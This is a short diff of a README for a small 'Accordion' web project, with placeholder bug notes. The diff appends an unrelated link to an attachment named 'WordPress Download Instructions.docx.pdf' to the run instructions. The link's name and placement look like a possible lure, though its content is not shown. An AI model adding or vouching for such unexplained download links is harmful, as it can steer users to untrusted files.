hl709/Accordion/README.md

 after blah.
 The problem occured again after blah was added (fix terminology).
 Reloading the page with JavaScript didn't work so PHP may be needed to fix this bug.

 # How to run
-In order to run this program, a virtual environment is required.
+In order to run this program, a virtual environment is required.[WordPress Download Instructions.docx.pdf](https://github.com/user-attachments/files/21222272/WordPress.Download.Instructions.docx.pdf)